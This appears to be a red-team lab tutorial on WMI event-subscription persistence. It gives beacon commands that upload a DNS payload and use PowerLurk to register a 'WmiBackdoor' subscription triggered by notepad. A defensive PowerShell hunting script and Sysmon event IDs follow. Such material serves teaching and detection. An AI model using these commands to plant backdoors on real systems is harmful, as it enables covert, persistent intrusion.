WMI Event Subscriptions

Persistence via WMI events can be achieved by leveraging the following three classes:

  • EventConsumer

  • EventFilter

  • FilterToConsumerBinding

An EventConsumer is the action we want to perform, in this case executing a payload. This can be an OS command (such as a PowerShell one-liner) or a VBScript. An EventFilter is the trigger we act upon. Any arbitrary WMI query can be used as a filter, which gives practically unlimited options: a particular process starting, a user logging in, a USB device being inserted, a specific time of day, or a timed interval. The FilterToConsumerBinding simply links an EventConsumer and an EventFilter together.

PowerLurk is a PowerShell tool for building these WMI events. In this example, I will upload a DNS payload into the Windows directory, import PowerLurk.ps1 and create a new WMI event subscription that will execute it whenever notepad is started.

beacon> cd C:\Windows
beacon> upload C:\Payloads\dns_x64.exe
beacon> powershell-import C:\Tools\PowerLurk.ps1
beacon> powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe

You can view these classes afterwards using Get-WmiEvent -Name WmiBackdoor. The CommandLineTemplate for the EventConsumer will simply be C:\Windows\dns_x64.exe, and the query for the EventFilter will be SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'.

Open notepad on Workstation 2 and the DNS Beacon will appear.

The backdoor can be removed with Get-WmiEvent -Name WmiBackdoor | Remove-WmiObject.
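From the defender's side, the same three classes are what you hunt for. The following PowerShell is an added example, not part of this page or of PowerLurk: it enumerates root\subscription, pairs every FilterToConsumerBinding with its EventFilter query and EventConsumer action, and flags bindings whose consumer executes a command or script, which is how a subscription like WmiBackdoor stands out. The function names are my own.

```powershell
# Added hunting example (not part of the original page or PowerLurk): enumerate every
# permanent WMI event subscription on the host and reconstruct filter -> consumer pairs.
# Function names are assumed/hypothetical; the namespace and class names are standard.

function Get-RefName {
    # Binding.Filter / Binding.Consumer are object references. Get-CimInstance normally
    # returns these as CimInstance objects; older tooling returns path strings such as
    # \\.\root\subscription:__EventFilter.Name="WmiBackdoor". Handle both forms.
    param($Ref)
    if ($Ref -is [string]) {
        if ($Ref -match 'Name="([^"]+)"') { return $Matches[1] }
        return $Ref
    }
    return $Ref.Name
}

function Find-WmiSubscription {
    $ns        = 'root/subscription'
    $filters   = @{}
    $consumers = @{}

    Get-CimInstance -Namespace $ns -ClassName __EventFilter |
        ForEach-Object { $filters[$_.Name] = $_.Query }

    # Collect the two consumer types that run code: command lines and scripts.
    Get-CimInstance -Namespace $ns -ClassName CommandLineEventConsumer |
        ForEach-Object { $consumers[$_.Name] = "cmd: $($_.CommandLineTemplate)" }
    Get-CimInstance -Namespace $ns -ClassName ActiveScriptEventConsumer |
        ForEach-Object { $consumers[$_.Name] = "script($($_.ScriptingEngine)): $($_.ScriptText)" }

    Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding | ForEach-Object {
        $f = Get-RefName $_.Filter
        $c = Get-RefName $_.Consumer
        [pscustomobject]@{
            Filter       = $f
            Query        = $filters[$f]
            Consumer     = $c
            Action       = $consumers[$c]
            # The stock "SCM Event Log" binding uses an NTEventLogEventConsumer, so it is
            # not flagged; any binding to a command/script consumer deserves a look.
            ExecutesCode = ($null -ne $consumers[$c])
        }
    }
}

Find-WmiSubscription | Format-List
```

Run it elevated so the root\subscription namespace is fully readable. Where Sysmon is deployed, the same creation events are logged as Event IDs 19 (WmiEventFilter), 20 (WmiEventConsumer) and 21 (WmiEventConsumerToFilter), which lets you catch the subscription at the moment it is registered rather than on a later sweep.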